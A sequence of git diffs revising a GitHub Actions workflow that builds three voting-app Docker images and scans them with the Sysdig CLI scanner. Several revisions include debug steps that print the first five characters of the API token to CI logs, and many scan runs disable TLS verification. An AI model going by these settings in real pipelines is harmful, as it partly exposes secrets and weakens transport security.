             -v /var/run/docker.sock:/var/run/docker.sock \
-            -e SYSDIG_API_TOKEN \
-            -e SYSDIG_API_URL \
-            quay.io/sysdig/sysdig-cli-scanner \
+            quay.io/sysdig/sysdig-cli-scanner:latest \
+              --apiurl https://app.au1.sysdig.com \
+              --client-token $SECURE_API_TOKEN \
               docker://result
 

--- a/.github/workflows/scan.yml
+++ b/.github/workflows/scan.yml
@@ -2,13 +2,17 @@ name: Sysdig Image Scan
 
 on:
   push:
-    branches: [main]
+    branches:
+      - main
   workflow_dispatch:
 
-jobs:
-  scan:
-    runs-on: ubuntu-latest
+env:
+  SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }}
+  SYS_DIG_SECURE_URL: https://app.au1.sysdig.com
 
+jobs:
+  image-scan:
+    runs-on: ubuntu-latest
     steps:
       - name: Checkout code
         uses: actions/checkout@v3
@@ -19,28 +23,30 @@ jobs:
           docker build -t worker ./worker
           docker build -t result ./result
 
-      - name: Run Sysdig CLI Scanner (Dockerized)
-        env:
-          SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }}
+      - name: Run Sysdig Scan on voting-app
         run: |
           docker run --rm \
             -v /var/run/docker.sock:/var/run/docker.sock \
             quay.io/sysdig/sysdig-cli-scanner:latest \
-              --apiurl https://app.au1.sysdig.com \
-              --token $SECURE_API_TOKEN \
-              docker://voting-app
+            scan docker://voting-app \
+            --apiurl $SYS_DIG_SECURE_URL \
+            --client-token $SECURE_API_TOKEN
 
+      - name: Run Sysdig Scan on worker
+        run: |
           docker run --rm \
             -v /var/run/docker.sock:/var/run/docker.sock \
             quay.io/sysdig/sysdig-cli-scanner:latest \
-              --apiurl https://app.au1.sysdig.com \
-              --token $SECURE_API_TOKEN \
-              docker://worker
+            scan docker://worker \
+            --apiurl $SYS_DIG_SECURE_URL \
+            --client-token $SECURE_API_TOKEN
 
+      - name: Run Sysdig Scan on result
+        run: |
           docker run --rm \
             -v /var/run/docker.sock:/var/run/docker.sock \
             quay.io/sysdig/sysdig-cli-scanner:latest \
-              --apiurl https://app.au1.sysdig.com \
-              --token $SECURE_API_TOKEN \
-              docker://result
+            scan docker://result \
+            --apiurl $SYS_DIG_SECURE_URL \
+            --client-token $SECURE_API_TOKEN
 

--- a/.github/workflows/scan.yml
+++ b/.github/workflows/scan.yml
@@ -14,29 +14,29 @@ jobs:
       SYS_DIG_SECURE_URL: https://app.au1.sysdig.com
 
     steps:
-      - name: 🛎️ Checkout code
+      - name: Checkout code
         uses: actions/checkout@v3
 
-      - name: 🏗️ Build Docker images
+      - name: Build Docker images
         run: |
           docker build -t voting-app ./vote
           docker build -t worker ./worker
           docker build -t result ./result
 
-      - name: 🔍 DEBUG: Check if SECURE_API_TOKEN is available
-        env:
-          SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }}
+      - name: Debug: Check if SECURE_API_TOKEN is available
         run: |
-          echo "🔍 Token Length: ${#SECURE_API_TOKEN}"
-          echo "🔍 Token Head: ${SECURE_API_TOKEN:0:5}"
+          echo "Token Length: ${#SECURE_API_TOKEN}"
+          echo "Token Head: ${SECURE_API_TOKEN:0:5}"
           if [ -z "$SECURE_API_TOKEN" ]; then
-            echo "❌ SECURE_API_TOKEN is NOT set!"
+            echo "SECURE_API_TOKEN is NOT set!"
             exit 1
           else
-            echo "✅ SECURE_API_TOKEN is available."
+            echo "SECURE_API_TOKEN is available."
           fi
+        env:
+          SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }}
 
-      - name: 🔍 Run Sysdig Scan (voting-app)
+      - name: Run Sysdig Scan (voting-app)
         run: |
           docker run --rm \
             --platform linux/amd64 \

--- a/.github/workflows/scan.yml
+++ b/.github/workflows/scan.yml
@@ -22,7 +22,7 @@ jobs:
         uses: docker/setup-buildx-action@v2
 
       - name: Log in to DockerHub (optional)
-        if: secrets.DOCKERHUB_USERNAME && secrets.DOCKERHUB_TOKEN
+        if: ${{ secrets.DOCKERHUB_USERNAME && secrets.DOCKERHUB_TOKEN }}
         uses: docker/login-action@v2
         with:
           username: ${{ secrets.DOCKERHUB_USERNAME }}
@@ -38,14 +38,5 @@ jobs:
         env:
           SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }}
         run: |
-          docker run --rm \
-            --platform linux/amd64 \
-            --user 0 \
-            -v "$(pwd)/scan-logs:/home/nonroot/scan-logs" \
-            -v /var/run/docker.sock:/var/run/docker.sock \
-            -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \
-            quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
-              --apiurl "$SYS_DIG_SECURE_URL" \
-              --loglevel info \
-              --skiptlsverify \
-              docker://voting-app
+          docker run --rm             --platform linux/amd64             --user 0             -v "$(pwd)/scan-logs:/home/nonroot/scan-logs"             -v /var/run/docker.sock:/var/run/docker.sock             -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}"             quay.io/sysdig/sysdig-cli-scanner:1.22.4               --apiurl "$SYS_DIG_SECURE_URL"               --loglevel info               --skiptlsverify               docker://voting-app
+

--- a/.github/workflows/scan.yml
+++ b/.github/workflows/scan.yml
@@ -25,15 +25,15 @@ jobs:
 
       - name: Debug
         env:
-          SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }}
+          SYSDIG_SECURE_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }}
         run: |
-          echo "🔍 Token Length: ${#SECURE_API_TOKEN}"
-          echo "🔍 Token Head: ${SECURE_API_TOKEN:0:5}"
-          if [ -z "$SECURE_API_TOKEN" ]; then
-            echo "❌ SECURE_API_TOKEN is NOT set!"
+          echo "🔍 Token Length: ${#SYSDIG_SECURE_TOKEN}"
+          echo "🔍 Token Head: ${SYSDIG_SECURE_TOKEN:0:5}"
+          if [ -z "$SYSDIG_SECURE_TOKEN" ]; then
+            echo "❌ SYSDIG_SECURE_TOKEN is NOT set!"
             exit 1
           else
-            echo "✅ SECURE_API_TOKEN is available."
+            echo "✅ SYSDIG_SECURE_TOKEN is available."
           fi
 
       - name: Run Sysdig Scan (voting-app)
@@ -43,7 +43,7 @@ jobs:
             --user 0 \
             -v "$(pwd)/scan-logs:/home/nonroot/scan-logs" \
             -v /var/run/docker.sock:/var/run/docker.sock \
-            -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \
+            -e SYSDIG_SECURE_TOKEN="${{ secrets.SYSDIG_SECURE_TOKEN }}" \
             quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
               --apiurl "$SYS_DIG_SECURE_URL" \
               --loglevel debug \

--- a/.github/workflows/scan.yml
+++ b/.github/workflows/scan.yml
@@ -10,7 +10,8 @@ jobs:
     runs-on: ubuntu-latest
 
     steps:
-      - uses: actions/checkout@v3
+      - name: Checkout source
+        uses: actions/checkout@v3
 
       - name: Build Docker images
         run: |
@@ -20,10 +21,10 @@ jobs:
 
       - name: Download Sysdig CLI Scanner
         run: |
-          curl -sSL "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/$(curl -L -s https://download.sysdig.com/scanning/sysdig-cli-scanner/latest_version.txt)/linux/amd64/sysdig-cli-scanner" -o scanner
+          curl -sSL "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/$(curl -sSL https://download.sysdig.com/scanning/sysdig-cli-scanner/latest_version.txt)/linux/amd64/sysdig-cli-scanner" -o scanner
           chmod +x scanner
 
-      - name: Run Sysdig Scan
+      - name: Run Sysdig Image Scan
         env:
           SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }}
           SYS_DIG_SECURE_URL: https://app.au1.sysdig.com

--- a/.github/workflows/scan.yml
+++ b/.github/workflows/scan.yml
@@ -21,9 +21,10 @@ jobs:
 
       - name: Download Sysdig CLI Scanner
         run: |
-          curl -sSL "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/$(curl -sSL https://download.sysdig.com/scanning/sysdig-cli-scanner/latest_version.txt)/linux/amd64/sysdig-cli-scanner" -o scanner
-          chmod +x scanner
-
+          LATEST_VERSION=$(curl -sSL https://download.sysdig.com/scanning/sysdig-cli-scanner/latest_version.txt)
+          curl -sSL "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/${LATEST_VERSION}/linux/amd64/sysdig-cli-scanner" -o sysdig-cli-scanner
+          chmod +x sysdig-cli-scanner
+          ./sysdig-cli-scanner version
       - name: Run Sysdig Image Scan
         env:
           SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }}

--- a/.github/workflows/scan.yml
+++ b/.github/workflows/scan.yml
@@ -10,7 +10,7 @@ jobs:
   image-scan:
     runs-on: ubuntu-latest
 
-    # 🧪 環境変数の注入（ここが非常に重要）
+    # 🧪 環境変数の注入（Secretsから取得）
     env:
       SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }}
       SYS_DIG_SECURE_URL: https://app.au1.sysdig.com
@@ -30,28 +30,28 @@ jobs:
           docker run --rm \
             -v /var/run/docker.sock:/var/run/docker.sock \
             quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
-              scan \
-              --apiurl $SYS_DIG_SECURE_URL \
-              --token $SECURE_API_TOKEN \
-              docker://voting-app
+            scan \
+            --apiurl $SYS_DIG_SECURE_URL \
+            --token $SECURE_API_TOKEN \
+            docker://voting-app
 
       - name: 🔍 Run Sysdig Scan (worker)
         run: |
           docker run --rm \
             -v /var/run/docker.sock:/var/run/docker.sock \
             quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
-              scan \
-              --apiurl $SYS_DIG_SECURE_URL \
-              --token $SECURE_API_TOKEN \
-              docker://worker
+            scan \
+            --apiurl $SYS_DIG_SECURE_URL \
+            --token $SECURE_API_TOKEN \
+            docker://worker
 
       - name: 🔍 Run Sysdig Scan (result)
         run: |
           docker run --rm \
             -v /var/run/docker.sock:/var/run/docker.sock \
             quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
-              scan \
-              --apiurl $SYS_DIG_SECURE_URL \
-              --token $SECURE_API_TOKEN \
-              docker://result
+            scan \
+            --apiurl $SYS_DIG_SECURE_URL \
+            --token $SECURE_API_TOKEN \
+            docker://result
 

--- a/.github/workflows/scan.yml
+++ b/.github/workflows/scan.yml
@@ -16,7 +16,7 @@ jobs:
 
       - name: Build Docker images
         run: |
-          docker build -t voting-app ./voting-app
+          docker build -t voting-app ./vote
           docker build -t worker ./worker
           docker build -t result ./result
 

--- a/.github/workflows/scan.yml
+++ b/.github/workflows/scan.yml
@@ -6,12 +6,12 @@ on:
       - main
   workflow_dispatch:
 
-env:
-  SYSDIG_SECURE_URL: https://app.au1.sysdig.com
-
 jobs:
   image-scan:
     runs-on: ubuntu-latest
+
+    env:
+      SYSDIG_SECURE_URL: https://app.au1.sysdig.com
 
     steps:
       - name: Checkout code
@@ -23,27 +23,27 @@ jobs:
           docker build -t worker ./worker
           docker build -t result ./result
 
-      - name: Run Sysdig Scan on voting-app
+      - name: Scan voting-app image with Sysdig CLI
         run: |
           docker run --rm \
             -v /var/run/docker.sock:/var/run/docker.sock \
             -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \
             quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
-              scan --apiurl $SYSDIG_SECURE_URL docker://voting-app
+            scan --apiurl "${SYSDIG_SECURE_URL}" docker://voting-app
 
-      - name: Run Sysdig Scan on worker
+      - name: Scan worker image with Sysdig CLI
         run: |
           docker run --rm \
             -v /var/run/docker.sock:/var/run/docker.sock \
             -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \
             quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
-              scan --apiurl $SYSDIG_SECURE_URL docker://worker
+            scan --apiurl "${SYSDIG_SECURE_URL}" docker://worker
 
-      - name: Run Sysdig Scan on result
+      - name: Scan result image with Sysdig CLI
         run: |
           docker run --rm \
             -v /var/run/docker.sock:/var/run/docker.sock \
             -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \
             quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
-              scan --apiurl $SYSDIG_SECURE_URL docker://result
+            scan --apiurl "${SYSDIG_SECURE_URL}" docker://result
 

--- a/.github/workflows/scan.yml
+++ b/.github/workflows/scan.yml
@@ -49,4 +49,3 @@ jobs:
               --loglevel info \
               --skiptlsverify \
               docker://voting-app
-

--- a/.github/workflows/scan.yml
+++ b/.github/workflows/scan.yml
@@ -23,8 +23,7 @@ jobs:
           docker build -t worker ./worker
           docker build -t result ./result
 
-      - 
-        name: Debug: Check if SECURE_API_TOKEN is available
+      - name: Debug
         env:
           SECURE_API_TOKEN: "${{ secrets.SECURE_API_TOKEN }}"
         run: |
@@ -35,9 +34,18 @@ jobs:
             exit 1
           else
             echo "✅ SECURE_API_TOKEN is available."
-          fi
 
       - name: Run Sysdig Scan (voting-app)
         run: |
-          docker run --rm             --platform linux/amd64             --user 0             -v "$(pwd)/scan-logs:/home/nonroot/scan-logs"             -v /var/run/docker.sock:/var/run/docker.sock             -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}"             quay.io/sysdig/sysdig-cli-scanner:1.22.4               --apiurl "$SYS_DIG_SECURE_URL"               --loglevel debug               --skiptlsverify               docker://voting-app
+          docker run --rm \
+            --platform linux/amd64 \
+            --user 0 \
+            -v "$(pwd)/scan-logs:/home/nonroot/scan-logs" \
+            -v /var/run/docker.sock:/var/run/docker.sock \
+            -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \
+            quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
+              --apiurl "$SYS_DIG_SECURE_URL" \
+              --loglevel debug \
+              --skiptlsverify \
+              docker://voting-app
 

--- a/.github/workflows/scan.yml
+++ b/.github/workflows/scan.yml
@@ -25,15 +25,15 @@ jobs:
 
       - name: Debug
         env:
-          SYSDIG_SECURE_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }}
+          SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }}
         run: |
-          echo "🔍 Token Length: ${#SYSDIG_SECURE_TOKEN}"
-          echo "🔍 Token Head: ${SYSDIG_SECURE_TOKEN:0:5}"
-          if [ -z "$SYSDIG_SECURE_TOKEN" ]; then
-            echo "❌ SYSDIG_SECURE_TOKEN is NOT set!"
+          echo "🔍 Token Length: ${#SECURE_API_TOKEN}"
+          echo "🔍 Token Head: ${SECURE_API_TOKEN:0:5}"
+          if [ -z "$SECURE_API_TOKEN" ]; then
+            echo "❌ SECURE_API_TOKEN is NOT set!"
             exit 1
           else
-            echo "✅ SYSDIG_SECURE_TOKEN is available."
+            echo "✅ SECURE_API_TOKEN is available."
           fi
 
       - name: Run Sysdig Scan (voting-app)
@@ -43,7 +43,7 @@ jobs:
             --user 0 \
             -v "$(pwd)/scan-logs:/home/nonroot/scan-logs" \
             -v /var/run/docker.sock:/var/run/docker.sock \
-            -e SYSDIG_SECURE_TOKEN="${{ secrets.SYSDIG_SECURE_TOKEN }}" \
+            -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \
             quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
               --apiurl "$SYS_DIG_SECURE_URL" \
               --loglevel debug \

--- a/.github/workflows/scan.yml
+++ b/.github/workflows/scan.yml
@@ -24,6 +24,8 @@ jobs:
           docker build -t result ./result
 
       - name: 🔍 DEBUG: Check if SECURE_API_TOKEN is available
+        env:
+          SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }}
         run: |
           echo "🔍 Token Length: ${#SECURE_API_TOKEN}"
           echo "🔍 Token Head: ${SECURE_API_TOKEN::5}"
@@ -33,8 +35,6 @@ jobs:
           else
             echo "✅ SECURE_API_TOKEN is available."
           fi
-        env:
-          SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }}
 
       - name: 🔍 Run Sysdig Scan (voting-app)
         run: |

--- a/.github/workflows/scan.yml
+++ b/.github/workflows/scan.yml
@@ -10,40 +10,48 @@ jobs:
   image-scan:
     runs-on: ubuntu-latest
 
+    # 🧪 環境変数の注入（ここが非常に重要）
     env:
-      SYSDIG_SECURE_URL: https://app.au1.sysdig.com
+      SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }}
+      SYS_DIG_SECURE_URL: https://app.au1.sysdig.com
 
     steps:
-      - name: Checkout code
+      - name: 🛎️ Checkout code
         uses: actions/checkout@v3
 
-      - name: Build Docker images
+      - name: 🏗️ Build Docker images
         run: |
           docker build -t voting-app ./vote
           docker build -t worker ./worker
           docker build -t result ./result
 
-      - name: Scan voting-app image with Sysdig CLI
+      - name: 🔍 Run Sysdig Scan (voting-app)
         run: |
           docker run --rm \
             -v /var/run/docker.sock:/var/run/docker.sock \
-            -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \
             quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
-            scan --apiurl "${SYSDIG_SECURE_URL}" docker://voting-app
+              scan \
+              --apiurl $SYS_DIG_SECURE_URL \
+              --token $SECURE_API_TOKEN \
+              docker://voting-app
 
-      - name: Scan worker image with Sysdig CLI
+      - name: 🔍 Run Sysdig Scan (worker)
         run: |
           docker run --rm \
             -v /var/run/docker.sock:/var/run/docker.sock \
-            -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \
             quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
-            scan --apiurl "${SYSDIG_SECURE_URL}" docker://worker
+              scan \
+              --apiurl $SYS_DIG_SECURE_URL \
+              --token $SECURE_API_TOKEN \
+              docker://worker
 
-      - name: Scan result image with Sysdig CLI
+      - name: 🔍 Run Sysdig Scan (result)
         run: |
           docker run --rm \
             -v /var/run/docker.sock:/var/run/docker.sock \
-            -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \
             quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
-            scan --apiurl "${SYSDIG_SECURE_URL}" docker://result
+              scan \
+              --apiurl $SYS_DIG_SECURE_URL \
+              --token $SECURE_API_TOKEN \
+              docker://result
 

--- a/.github/workflows/scan.yml
+++ b/.github/workflows/scan.yml
@@ -1,18 +1,14 @@
 name: Sysdig Image Scan
 
 on:
-  workflow_dispatch:
   push:
     branches:
       - main
+  workflow_dispatch:
 
 jobs:
   image-scan:
     runs-on: ubuntu-latest
-
-    env:
-      SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }}
-      SYS_DIG_SECURE_URL: https://app.au1.sysdig.com
 
     steps:
       - name: 🛎️ Checkout code
@@ -24,45 +20,48 @@ jobs:
           docker build -t worker ./worker
           docker build -t result ./result
 
-      - name: 🔍 Scan voting-app with Sysdig
+      - name: 🛡️ Scan voting-app with Sysdig
+        env:
+          SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }}
         run: |
           docker run --rm \
             --platform linux/amd64 \
             --user 0 \
-            -v "${{ github.workspace }}/scan-logs:/home/nonroot/scan-logs" \
             -v /var/run/docker.sock:/var/run/docker.sock \
-            -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \
+            -e SECURE_API_TOKEN=$SECURE_API_TOKEN \
             quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
-              --apiurl $SYS_DIG_SECURE_URL \
-              --loglevel debug \
+              --apiurl https://app.au1.sysdig.com \
+              --loglevel info \
               --skiptlsverify \
               docker://voting-app
 
-      - name: 🔍 Scan worker with Sysdig
+      - name: 🛡️ Scan worker with Sysdig
+        env:
+          SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }}
         run: |
           docker run --rm \
             --platform linux/amd64 \
             --user 0 \
-            -v "${{ github.workspace }}/scan-logs:/home/nonroot/scan-logs" \
             -v /var/run/docker.sock:/var/run/docker.sock \
-            -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \
+            -e SECURE_API_TOKEN=$SECURE_API_TOKEN \
             quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
-              --apiurl $SYS_DIG_SECURE_URL \
-              --loglevel debug \
+              --apiurl https://app.au1.sysdig.com \
+              --loglevel info \
               --skiptlsverify \
               docker://worker
 
-      - name: 🔍 Scan result with Sysdig
+      - name: 🛡️ Scan result with Sysdig
+        env:
+          SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }}
         run: |
           docker run --rm \
             --platform linux/amd64 \
             --user 0 \
-            -v "${{ github.workspace }}/scan-logs:/home/nonroot/scan-logs" \
             -v /var/run/docker.sock:/var/run/docker.sock \
-            -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \
+            -e SECURE_API_TOKEN=$SECURE_API_TOKEN \
             quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
-              --apiurl $SYS_DIG_SECURE_URL \
-              --loglevel debug \
+              --apiurl https://app.au1.sysdig.com \
+              --loglevel info \
               --skiptlsverify \
               docker://result
 

--- a/.github/workflows/scan.yml
+++ b/.github/workflows/scan.yml
@@ -1,42 +1,42 @@
-name: Sysdig Image Scan
+name: Voting App Build & Scan
 
 on:
   push:
     branches:
       - main
+  pull_request:
   workflow_dispatch:
 
 jobs:
-  image-scan:
+  build-and-scan:
     runs-on: ubuntu-latest
 
     env:
       SYS_DIG_SECURE_URL: https://app.au1.sysdig.com
 
     steps:
-      - name: Checkout code
+      - name: Checkout source
         uses: actions/checkout@v3
 
-      - name: Build Docker images
+      - name: Set up Docker Buildx
+        uses: docker/setup-buildx-action@v2
+
+      - name: Log in to DockerHub (optional)
+        if: secrets.DOCKERHUB_USERNAME && secrets.DOCKERHUB_TOKEN
+        uses: docker/login-action@v2
+        with:
+          username: ${{ secrets.DOCKERHUB_USERNAME }}
+          password: ${{ secrets.DOCKERHUB_TOKEN }}
+
+      - name: Build Voting App images
         run: |
           docker build -t voting-app ./vote
           docker build -t worker ./worker
           docker build -t result ./result
 
-      - name: Debug
+      - name: Scan image with Sysdig CLI Scanner
         env:
           SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }}
-        run: |
-          echo "🔍 Token Length: ${#SECURE_API_TOKEN}"
-          echo "🔍 Token Head: ${SECURE_API_TOKEN:0:5}"
-          if [ -z "$SECURE_API_TOKEN" ]; then
-            echo "❌ SECURE_API_TOKEN is NOT set!"
-            exit 1
-          else
-            echo "✅ SECURE_API_TOKEN is available."
-          fi
-
-      - name: Run Sysdig Scan (voting-app)
         run: |
           docker run --rm \
             --platform linux/amd64 \
@@ -46,7 +46,7 @@ jobs:
             -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \
             quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
               --apiurl "$SYS_DIG_SECURE_URL" \
-              --loglevel debug \
+              --loglevel info \
               --skiptlsverify \
               docker://voting-app
 

--- a/.github/workflows/scan.yml
+++ b/.github/workflows/scan.yml
@@ -23,7 +23,7 @@ jobs:
           docker build -t worker ./worker
           docker build -t result ./result
 
-      - name: Debug: Check if SECURE_API_TOKEN is available
+      - name: Debug
         env:
           SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }}
         run: |

--- a/.github/workflows/scan.yml
+++ b/.github/workflows/scan.yml
@@ -23,18 +23,17 @@ jobs:
           docker build -t worker ./worker
           docker build -t result ./result
 
-      - name: Debug: Check if SECURE_API_TOKEN is available
+      - name: Set SECURE_API_TOKEN env and debug
         run: |
-          echo "Token Length: ${#SECURE_API_TOKEN}"
-          echo "Token Head: ${SECURE_API_TOKEN:0:5}"
+          export SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}"
+          echo "🔍 Token Length: ${#SECURE_API_TOKEN}"
+          echo "🔍 Token Head: ${SECURE_API_TOKEN:0:5}"
           if [ -z "$SECURE_API_TOKEN" ]; then
-            echo "SECURE_API_TOKEN is NOT set!"
+            echo "❌ SECURE_API_TOKEN is NOT set!"
             exit 1
           else
-            echo "SECURE_API_TOKEN is available."
+            echo "✅ SECURE_API_TOKEN is available."
           fi
-        env:
-          SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }}
 
       - name: Run Sysdig Scan (voting-app)
         run: |
@@ -43,9 +42,10 @@ jobs:
             --user 0 \
             -v "$(pwd)/scan-logs:/home/nonroot/scan-logs" \
             -v /var/run/docker.sock:/var/run/docker.sock \
-            -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \
+            -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \
             quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
-              --apiurl $SYS_DIG_SECURE_URL \
+              --apiurl "$SYS_DIG_SECURE_URL" \
               --loglevel debug \
               --skiptlsverify \
               docker://voting-app
+

--- a/.github/workflows/scan.yml
+++ b/.github/workflows/scan.yml
@@ -1,4 +1,4 @@
-name: Sysdig Image Scan
+name: Sysdig Container Scanner (Stable)
 
 on:
   push:
@@ -6,11 +6,11 @@ on:
   workflow_dispatch:
 
 jobs:
-  image-scan:
+  scan:
     runs-on: ubuntu-latest
 
     steps:
-      - name: Checkout source
+      - name: Checkout
         uses: actions/checkout@v3
 
       - name: Build Docker images
@@ -19,20 +19,28 @@ jobs:
           docker build -t worker ./worker
           docker build -t result ./result
 
-      - name: Download Sysdig CLI Scanner
-        run: |
-          VERSION=$(curl -sSL https://download.sysdig.com/scanning/sysdig-cli-scanner/latest_version.txt)
-          echo "Latest version: $VERSION"
-          curl -sSL "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/${VERSION}/linux/amd64/sysdig-cli-scanner" -o sysdig-cli-scanner
-          chmod +x sysdig-cli-scanner
-          ./sysdig-cli-scanner --version
-
-      - name: Run Sysdig CLI Scanner
+      - name: Run Sysdig CLI Scanner (Dockerized)
         env:
           SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }}
-          SYS_DIG_SECURE_URL: https://app.au1.sysdig.com
         run: |
-          ./sysdig-cli-scanner --apiurl $SYS_DIG_SECURE_URL --token $SECURE_API_TOKEN docker://voting-app
-          ./sysdig-cli-scanner --apiurl $SYS_DIG_SECURE_URL --token $SECURE_API_TOKEN docker://worker
-          ./sysdig-cli-scanner --apiurl $SYS_DIG_SECURE_URL --token $SECURE_API_TOKEN docker://result
+          docker run --rm \
+            -v /var/run/docker.sock:/var/run/docker.sock \
+            quay.io/sysdig/sysdig-cli-scanner:latest \
+              --apiurl https://app.au1.sysdig.com \
+              --token $SECURE_API_TOKEN \
+              docker://voting-app
+
+          docker run --rm \
+            -v /var/run/docker.sock:/var/run/docker.sock \
+            quay.io/sysdig/sysdig-cli-scanner:latest \
+              --apiurl https://app.au1.sysdig.com \
+              --token $SECURE_API_TOKEN \
+              docker://worker
+
+          docker run --rm \
+            -v /var/run/docker.sock:/var/run/docker.sock \
+            quay.io/sysdig/sysdig-cli-scanner:latest \
+              --apiurl https://app.au1.sysdig.com \
+              --token $SECURE_API_TOKEN \
+              docker://result
 

--- a/.github/workflows/scan.yml
+++ b/.github/workflows/scan.yml
@@ -49,4 +49,3 @@ jobs:
               --loglevel debug \
               --skiptlsverify \
               docker://voting-app
-

--- a/.github/workflows/scan.yml
+++ b/.github/workflows/scan.yml
@@ -11,51 +11,57 @@ jobs:
     runs-on: ubuntu-latest
 
     steps:
-      - name: Checkout code
+      - name: 🛎️ Checkout code
         uses: actions/checkout@v3
 
-      - name: Build Docker images
+      - name: 🏗️ Build Docker images
         run: |
           docker build -t voting-app ./vote
           docker build -t worker ./worker
           docker build -t result ./result
 
-      - name: Run Sysdig Scan (voting-app)
+      - name: 🔍 Run Sysdig Scan (voting-app)
+        env:
+          SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }}
         run: |
           docker run --rm \
             --platform linux/amd64 \
             --user 0 \
-            -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \
+            -e SECURE_API_TOKEN=$SECURE_API_TOKEN \
             -v /var/run/docker.sock:/var/run/docker.sock \
             quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
+              scan \
               --apiurl https://app.au1.sysdig.com \
-              --loglevel info \
               --skiptlsverify \
               docker://voting-app
 
-      - name: Run Sysdig Scan (worker)
+      - name: 🔍 Run Sysdig Scan (worker)
+        env:
+          SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }}
         run: |
           docker run --rm \
             --platform linux/amd64 \
             --user 0 \
-            -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \
+            -e SECURE_API_TOKEN=$SECURE_API_TOKEN \
             -v /var/run/docker.sock:/var/run/docker.sock \
             quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
+              scan \
               --apiurl https://app.au1.sysdig.com \
-              --loglevel info \
               --skiptlsverify \
               docker://worker
 
-      - name: Run Sysdig Scan (result)
+      - name: 🔍 Run Sysdig Scan (result)
+        env:
+          SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }}
         run: |
           docker run --rm \
             --platform linux/amd64 \
             --user 0 \
-            -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \
+            -e SECURE_API_TOKEN=$SECURE_API_TOKEN \
             -v /var/run/docker.sock:/var/run/docker.sock \
             quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
+              scan \
               --apiurl https://app.au1.sysdig.com \
-              --loglevel info \
               --skiptlsverify \
               docker://result
 

--- a/.github/workflows/scan.yml
+++ b/.github/workflows/scan.yml
@@ -1,4 +1,4 @@
-name: Sysdig Container Scanner (Stable)
+name: Sysdig Image Scan
 
 on:
   push:
@@ -21,26 +21,27 @@ jobs:
 
       - name: Run Sysdig CLI Scanner (Dockerized)
         env:
-          SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }}
